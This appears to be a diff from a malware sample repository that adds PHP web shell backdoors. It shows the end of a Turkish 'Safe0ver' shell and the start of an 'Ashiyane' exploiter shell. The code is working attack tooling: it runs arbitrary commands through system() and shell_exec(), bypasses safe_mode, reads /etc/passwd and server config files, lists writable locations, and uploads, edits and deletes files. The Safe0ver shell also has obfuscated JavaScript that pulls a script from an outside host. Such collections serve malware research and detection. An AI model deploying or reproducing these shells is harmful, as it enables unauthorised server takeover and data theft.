|
||||||
|
buildUrl( "| Dosya Y?kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
|
||||||
|
echo "<tr><td class=\"silver border\"> <strong>Script Location: </strong> </td><td> $PATH_TRANSLATED</td></tr>\n";
|
||||||
|
echo "<tr><td class=\"silver border\"> <strong>IP Adresin: </strong> </td><td> $REMOTE_ADDR </td></tr>\n";
|
||||||
|
echo "<tr><td class=\"silver border\"> <strong>Bulundugun Klas?r: </strong></td><td> $partdir </td></tr>\n";
|
||||||
|
echo "<tr><td valign=\"top\" class=\"silver border\"> <strong>Semboller: </strong </td><td>\n";
|
||||||
|
echo "<table NOWRAP>";
|
||||||
|
echo "<tr><td><strong>D:</strong></td><td> Klas?r.</td></tr>\n";
|
||||||
|
echo "<tr><td><strong>R:</strong></td><td> Okunabilir.</td></tr>\n";
|
||||||
|
echo "<tr><td><strong>W:</strong></td><td> Yazilabilir.</td></tr>\n";
|
||||||
|
echo "<tr><td><strong>X:</strong></td><td> Komut Calistirilabilir.</td></tr>\n";
|
||||||
|
echo "<tr><td><strong>U:</strong></td><td> HTTP Uploaded File.</td></tr>\n";
|
||||||
|
echo "</table></td>";
|
||||||
|
echo "</table>";
|
||||||
|
echo "<br>";
|
||||||
|
@closedir($h);
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="execute" ) {
|
||||||
|
echo system("$file");
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="deldir" ) {
|
||||||
|
echo "<center><table><tr><td NOWRAP>" ;
|
||||||
|
if ($auth == "yes") {
|
||||||
|
if (Mydeldir($file)==false) {
|
||||||
|
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "Successfully removed \"$file\"<br>";
|
||||||
|
}
|
||||||
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
|
||||||
|
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
|
||||||
|
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
|
||||||
|
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
|
||||||
|
<input type=\"hidden\" name=\"file\" value=\"$file\">
|
||||||
|
<input type=\"hidden\" name=\"auth\" value=\"yes\">
|
||||||
|
<input type=\"submit\" value=\"Yes\"></form>
|
||||||
|
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||||
|
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||||
|
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
|
||||||
|
}
|
||||||
|
echo "</td></tr></center>";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="delfile" ) { echo "<center><table><tr><td NOWRAP>" ;
|
||||||
|
if ($auth == "yes") {
|
||||||
|
if (@unlink($file)==false) {
|
||||||
|
echo "Could not remove \"$file\"<br>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "Successfully removed \"$file\"<br>";
|
||||||
|
}
|
||||||
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "Are you sure you want to delete \"$file\" ?
|
||||||
|
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
|
||||||
|
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
|
||||||
|
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
|
||||||
|
<input type=\"hidden\" name=\"file\" value=\"$file\">
|
||||||
|
<input type=\"hidden\" name=\"auth\" value=\"yes\">
|
||||||
|
|
||||||
|
<input type=\"submit\" value=\"Yes\"></form>
|
||||||
|
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||||
|
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||||
|
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
|
||||||
|
}
|
||||||
|
echo "</td></tr></center>";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="newfile" ) {
|
||||||
|
echo "<center><table><tr><td NOWRAP>";
|
||||||
|
$i = 1;
|
||||||
|
while (file_exists("$lastdir/newfile$i.txt"))
|
||||||
|
$i++;
|
||||||
|
$file = fopen("$lastdir/newfile$i.txt", "w+");
|
||||||
|
if ($file == false)
|
||||||
|
echo "Could not create the new file...<br>";
|
||||||
|
else
|
||||||
|
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
|
||||||
|
echo "
|
||||||
|
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||||
|
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||||
|
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\">
|
||||||
|
</form></center>
|
||||||
|
</td></tr></table></center> ";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="newdir" ) {
|
||||||
|
echo "<center><table><tr><td NOWRAP>" ;
|
||||||
|
$i = 1;
|
||||||
|
while (is_dir("$lastdir/newdir$i"))
|
||||||
|
$i++;
|
||||||
|
$file = mkdir("$lastdir/newdir$i", 0777);
|
||||||
|
if ($file == false)
|
||||||
|
echo "Could not create the new directory...<br>";
|
||||||
|
else
|
||||||
|
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
|
||||||
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||||
|
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||||
|
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\">
|
||||||
|
</form></center></td></tr></table></center>";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="edit" ) {
|
||||||
|
$contents = "";
|
||||||
|
$fc = @file( $file );
|
||||||
|
while ( @list( $ln, $line ) = each( $fc ) ) {
|
||||||
|
$contents .= htmlentities( $line ) ;
|
||||||
|
}
|
||||||
|
echo "<br><center><table><tr><td NOWRAP>";
|
||||||
|
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
|
||||||
|
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
|
||||||
|
echo "<strong>EDIT FILE: </strong>$file<br>\n";
|
||||||
|
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
|
||||||
|
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
|
||||||
|
echo "<input type=\"submit\" value=\"Save\">";
|
||||||
|
echo "</form>";
|
||||||
|
echo "</td></tr></table></center>";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="saveedit" ) {
|
||||||
|
$fo = fopen($file, "w");
|
||||||
|
$wrret = fwrite($fo, stripslashes($contents));
|
||||||
|
$clret = fclose($fo);
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="downl" ) {
|
||||||
|
$downloadfile = urldecode($file);
|
||||||
|
if (function_exists("basename"))
|
||||||
|
$downloadto = basename ($downloadfile);
|
||||||
|
else
|
||||||
|
$downloadto = "download.ext";
|
||||||
|
if (!file_exists("$downloadfile"))
|
||||||
|
echo "The file does not exist";
|
||||||
|
else {
|
||||||
|
$size = @filesize("$downloadfile");
|
||||||
|
if ($size != false) {
|
||||||
|
$add="; size=$size";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$add="";
|
||||||
|
}
|
||||||
|
header("Content-Type: application/download");
|
||||||
|
header("Content-Disposition: attachment; filename=$downloadto$add");
|
||||||
|
$fp=fopen("$downloadfile" ,"rb");
|
||||||
|
fpassthru($fp);
|
||||||
|
flush();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="upload" ) {
|
||||||
|
?>
|
||||||
|
<center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td NOWRAP>
|
||||||
|
Dosya Y?kleme Sekmesine Tikladiniz !
|
||||||
|
<br> Eger Y?klemek istediginiz Dosya mevcut ise ?zerine Yazilir.<br><br>
|
||||||
|
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
|
||||||
|
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
|
||||||
|
<input type="hidden" name="cmd" value="uploadproc">
|
||||||
|
<input type="hidden" name="dir" value="<?php echo $dir ?>">
|
||||||
|
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
|
||||||
|
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
|
||||||
|
Dosya Y?kle:<br>
|
||||||
|
<input size="75" name="userfile" type="file"><br>
|
||||||
|
<input type="submit" value="Y?kle">
|
||||||
|
</form>
|
||||||
|
<br>
|
||||||
|
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
|
||||||
|
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
|
||||||
|
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
|
||||||
|
<input tabindex="0" type="submit" value="Iptal">
|
||||||
|
</form>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</center>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="uploadproc" ) {
|
||||||
|
echo "<center><table><tr><td NOWRAP>";
|
||||||
|
if (file_exists($userfile))
|
||||||
|
$res = copy($userfile, "$dir/$userfile_name");
|
||||||
|
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
|
||||||
|
if ($res) {
|
||||||
|
echo "Basariyla Y?klendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
|
||||||
|
echo "Y?klenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
|
||||||
|
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "Y?klenemedi...";
|
||||||
|
}
|
||||||
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form></center>" ;
|
||||||
|
echo "<br><br></td></tr></table></center>";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="file" ) {
|
||||||
|
echo "<hr>";
|
||||||
|
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
|
||||||
|
echo spacetonbsp(@htmlentities($line))."<br>\n";
|
||||||
|
}
|
||||||
|
echo "<hr>";
|
||||||
|
}
|
||||||
|
elseif ( $cmd=="ren" ) {
|
||||||
|
if (function_exists('is_dir')) {
|
||||||
|
if (is_dir("$oldfile")) {
|
||||||
|
$objname = "Directory";
|
||||||
|
$objident = "Directory";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$objname = "Filename";
|
||||||
|
$objident = "file";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center> Rename a file: </center></td></tr></table><br>\n";
|
||||||
|
If (empty($newfile) != true) {
|
||||||
|
echo "<center>";
|
||||||
|
$return = @rename($oldfile, "$olddir$newfile");
|
||||||
|
if ($return) {
|
||||||
|
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if ( @file_exists("$olddir$newfile") ) {
|
||||||
|
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form></center>" ;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$dpos = strrpos($oldfile, "/");
|
||||||
|
if (strval($dpos)!="") {
|
||||||
|
$olddir = substr($oldfile, 0, $dpos+1);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$olddir = "$lastdir/";
|
||||||
|
}
|
||||||
|
$fpos = strrpos($oldfile, "/");
|
||||||
|
if (strval($fpos)!="") {
|
||||||
|
$inputfile = substr($oldfile, $fpos+1);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$inputfile = "";
|
||||||
|
}
|
||||||
|
echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
|
||||||
|
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
|
||||||
|
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
|
||||||
|
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
|
||||||
|
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
|
||||||
|
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
|
||||||
|
echo "Rename \"$oldfile\" to:<br>\n";
|
||||||
|
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
|
||||||
|
echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
|
||||||
|
echo "</td></tr></table></center>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else if ( $cmd == "con") {
|
||||||
|
|
||||||
|
?>
|
||||||
|
<center>
|
||||||
|
<table>
|
||||||
|
<tr><td> </td>
|
||||||
|
</tr></table>
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$isMainMenu = true;
|
||||||
|
?>
|
||||||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" class="border">
|
||||||
|
<center> -<[{ <?php echo $scriptTitle ?> Main Menu }]>- </center>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br>
|
||||||
|
<center>
|
||||||
|
<table border="0" NOWRAP>
|
||||||
|
<tr>
|
||||||
|
<td valign="top" class="silver border">
|
||||||
|
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
|
||||||
|
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass ?zelligi Eklenmis Ve B?ylece Tahrip G?c? Y?kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S?m?ren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullan?m:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
|
||||||
|
</span></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br><p><br>Safe Mode ByPAss<p><form method="POST">
|
||||||
|
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
|
||||||
|
<input type="submit" value="?alistir"></p>
|
||||||
|
</form>
|
||||||
|
<form method="POST">
|
||||||
|
<p align="center"><select size="1" name="dizin">
|
||||||
|
<option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
|
||||||
|
<option value="cat /etc/passwd">cat /etc/passwd</option>
|
||||||
|
<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
|
||||||
|
<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
|
||||||
|
<option value="cat /etc/hosts">cat /etc/hosts</option>
|
||||||
|
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
|
||||||
|
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
|
||||||
|
<option value="netstat -an | grep -i listen">A?ik Portlar</option>
|
||||||
|
<option value="ps -aux">?alisan Uygulamalar</option>
|
||||||
|
</select> <input type="submit" value="?alistir"></p>
|
||||||
|
</form>
|
||||||
|
------------------------------------------------------------------------------------<p>
|
||||||
|
<?
|
||||||
|
$evilc0der=$_POST['dizin'];
|
||||||
|
if($_POST['dizin'])
|
||||||
|
{
|
||||||
|
ini_restore("safe_mode");
|
||||||
|
ini_restore("open_basedir");
|
||||||
|
$safemodgec = shell_exec($evilc0der);
|
||||||
|
echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<Script Language='Javascript'>
|
||||||
|
<!-- HTML Encryption provided by iWEBTOOL.com -->
|
||||||
|
<!--
|
||||||
|
document.write(unescape('%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%70%68%70%2D%73%68%65%6C%6C%2E%6F%72%67%2F%63%77%68%69%64%64%65%6E%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E'));
|
||||||
|
//-->
|
||||||
|
</Script>
|
||||||
|
</center>
|
||||||
|
<br>
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($cmd != "downl") {
|
||||||
|
if ( $isMainMenu != true) {
|
||||||
|
?>
|
||||||
|
|
||||||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" style="class="silver border">
|
||||||
|
<center><strong>
|
||||||
|
<?php echo buildUrl("<font color=\"navy\">[ Main Menu ] </font>", "cmd=&dir="); ?>
|
||||||
|
|
||||||
|
<?php echo buildUrl("<font color=\"navy\">[ R00T ] </font>", "cmd=dir&dir=."); ?>
|
||||||
|
</strong></center>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br>
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<table width=100% border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" class="silver border">
|
||||||
|
<center> <?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?> </center>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
3069
PHP/Backdoor.PHP.C99Shell.a
Normal file
3069
PHP/Backdoor.PHP.C99Shell.a
Normal file
File diff suppressed because it is too large
Load Diff
3076
PHP/Backdoor.PHP.C99Shell.ad
Normal file
3076
PHP/Backdoor.PHP.C99Shell.ad
Normal file
File diff suppressed because it is too large
Load Diff
2927
PHP/Backdoor.PHP.C99Shell.af
Normal file
2927
PHP/Backdoor.PHP.C99Shell.af
Normal file
File diff suppressed because it is too large
Load Diff
3013
PHP/Backdoor.PHP.C99Shell.ag
Normal file
3013
PHP/Backdoor.PHP.C99Shell.ag
Normal file
File diff suppressed because it is too large
Load Diff
3545
PHP/Backdoor.PHP.C99Shell.al
Normal file
3545
PHP/Backdoor.PHP.C99Shell.al
Normal file
File diff suppressed because one or more lines are too long
80
PHP/Backdoor.PHP.C99Shell.am
Normal file
80
PHP/Backdoor.PHP.C99Shell.am
Normal file
File diff suppressed because one or more lines are too long
3318
PHP/Backdoor.PHP.C99Shell.ao
Normal file
3318
PHP/Backdoor.PHP.C99Shell.ao
Normal file
File diff suppressed because it is too large
Load Diff
22
PHP/Backdoor.PHP.C99Shell.aq
Normal file
22
PHP/Backdoor.PHP.C99Shell.aq
Normal file
File diff suppressed because one or more lines are too long
3159
PHP/Backdoor.PHP.C99Shell.bv
Normal file
3159
PHP/Backdoor.PHP.C99Shell.bv
Normal file
File diff suppressed because it is too large
Load Diff
3069
PHP/Backdoor.PHP.C99Shell.c
Normal file
3069
PHP/Backdoor.PHP.C99Shell.c
Normal file
File diff suppressed because it is too large
Load Diff
3076
PHP/Backdoor.PHP.C99Shell.d
Normal file
3076
PHP/Backdoor.PHP.C99Shell.d
Normal file
File diff suppressed because it is too large
Load Diff
2782
PHP/Backdoor.PHP.C99Shell.e
Normal file
2782
PHP/Backdoor.PHP.C99Shell.e
Normal file
File diff suppressed because it is too large
Load Diff
3284
PHP/Backdoor.PHP.C99Shell.h
Normal file
3284
PHP/Backdoor.PHP.C99Shell.h
Normal file
File diff suppressed because it is too large
Load Diff
2877
PHP/Backdoor.PHP.C99Shell.i
Normal file
2877
PHP/Backdoor.PHP.C99Shell.i
Normal file
File diff suppressed because it is too large
Load Diff
3556
PHP/Backdoor.PHP.C99Shell.m
Normal file
3556
PHP/Backdoor.PHP.C99Shell.m
Normal file
File diff suppressed because one or more lines are too long
3149
PHP/Backdoor.PHP.C99Shell.w
Normal file
3149
PHP/Backdoor.PHP.C99Shell.w
Normal file
File diff suppressed because it is too large
Load Diff
652
PHP/Backdoor.PHP.Exploiter.a
Normal file
652
PHP/Backdoor.PHP.Exploiter.a
Normal file
@ -0,0 +1,652 @@
|
|||||||
|
<CENTER>
|
||||||
|
<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">
|
||||||
|
<font color="#00FF00">
|
||||||
|
<marquee scrolldelay="30" scrollamount="2">Ashiyane Digital Security Team </marquee></font></DIV>
|
||||||
|
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;"> <p>
|
||||||
|
<span style="font-weight: 400"><font color="#0000FF">/server Irc.Ashiyane.com
|
||||||
|
/j #virus #Ashiyane</font></span></p>
|
||||||
|
<p><font color="#FF0000"><b>Virus@Ashiyane.com<BR>
|
||||||
|
</b></font></DIV>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
//
|
||||||
|
closelog( );
|
||||||
|
|
||||||
|
$dono = get_current_user( );
|
||||||
|
$ver = phpversion( );
|
||||||
|
$login = posix_getuid( );
|
||||||
|
$euid = posix_geteuid( );
|
||||||
|
$gid = posix_getgid( );
|
||||||
|
if ($chdir == "") $chdir = getcwd( );
|
||||||
|
|
||||||
|
?>
|
||||||
|
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
|
||||||
|
<?php
|
||||||
|
|
||||||
|
$uname = posix_uname( );
|
||||||
|
while (list($info, $value) = each ($uname)) {
|
||||||
|
|
||||||
|
?>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>
|
||||||
|
<font color="#F3B700">:</font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
||||||
|
<font color="#F3B700">Script Current User: <?= $dono ?></font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
||||||
|
<font color="#F3B700">PHP Version: <?= $ver ?></font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
||||||
|
<font color="#F3B700">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
||||||
|
<font color="#F3B700">Current Path: <?= $chdir ?></font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
||||||
|
<font color="#F3B700">Server IP: <?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?>
|
||||||
|
</font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
<TR>
|
||||||
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
||||||
|
<font color="#F3B700">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
|
||||||
|
</font></DIV></TD>
|
||||||
|
</TR>
|
||||||
|
</TABLE>
|
||||||
|
<BR>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if ($cmd != "") {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*]
|
||||||
|
<font color="#0000FF">Command Mode Run</DIV></font>";
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">
|
||||||
|
<font color="#FF0000">Command Prompt</font></DIV>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if ($fe == 1){
|
||||||
|
$fe = "exec";
|
||||||
|
}
|
||||||
|
if ($fe == ""){
|
||||||
|
$fe = "passthru";
|
||||||
|
}
|
||||||
|
if ($fe == "2"){
|
||||||
|
$fe = "system";
|
||||||
|
}
|
||||||
|
|
||||||
|
if (isset($chdir)) @chdir($chdir);
|
||||||
|
|
||||||
|
ob_start( );
|
||||||
|
$fe("$cmd 2>&1");
|
||||||
|
$output = ob_get_contents();
|
||||||
|
ob_end_clean( );
|
||||||
|
|
||||||
|
?>
|
||||||
|
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
|
||||||
|
?>
|
||||||
|
</TEXTAREA>
|
||||||
|
<BR>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($safemode != "") {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*]
|
||||||
|
<font color="#FF00FF">Safemode Mode Run</DIV></font>";
|
||||||
|
|
||||||
|
?>
|
||||||
|
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">
|
||||||
|
<font color="#FF0000">Safe Mode Directory Listing</font></DIV>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if ($dir = @opendir($chdir)) {
|
||||||
|
echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
|
||||||
|
echo "<TR>";
|
||||||
|
echo "<TD valign=top>";
|
||||||
|
echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
|
||||||
|
while (($file = readdir($dir)) !== false) {
|
||||||
|
if (@is_file($file)) {
|
||||||
|
$file1 = fileowner($file);
|
||||||
|
$file2 = fileperms($file);
|
||||||
|
echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
|
||||||
|
// echo "<font color=green>$file1 - $file2 - $file </font><br>";
|
||||||
|
flush( );
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "</TD>";
|
||||||
|
echo"<TD valign=top>";
|
||||||
|
echo "<font size=2 face=arial><font color="#FF00FF"><b>List Only Folders</b>
|
||||||
|
</font> <br><br>";
|
||||||
|
if ($dir = @opendir($chdir)) {
|
||||||
|
while (($file = readdir($dir)) !== false) {
|
||||||
|
if (@is_dir($file)) {
|
||||||
|
$file1 = fileowner($file);
|
||||||
|
$file2 = fileperms($file);
|
||||||
|
echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>";
|
||||||
|
// echo "<font color=blue>$file1 - $file2 - $file </font><br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</TD>";
|
||||||
|
echo"<TD valign=top>";
|
||||||
|
echo "</font><font color=#00FF00><b>List Writable Folders</b></font><font color=blue><br><br>";
|
||||||
|
if ($dir = @opendir($chdir)) {
|
||||||
|
while (($file = readdir($dir)) !== false) {
|
||||||
|
if (@is_writable($file) && @is_dir($file)) {
|
||||||
|
$file1 = fileowner($file);
|
||||||
|
$file2 = fileperms($file);
|
||||||
|
echo "<font color=red>$file1 - $file2 - $file </font><br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</TD>";
|
||||||
|
echo "</TD>";
|
||||||
|
echo "<TD valign=top>";
|
||||||
|
echo "</font><font color=#00FF00><b>List Writable Files</b> </font><font color=blue> <br><br>";
|
||||||
|
|
||||||
|
if ($dir = opendir($chdir)) {
|
||||||
|
while (($file = readdir($dir)) !== false) {
|
||||||
|
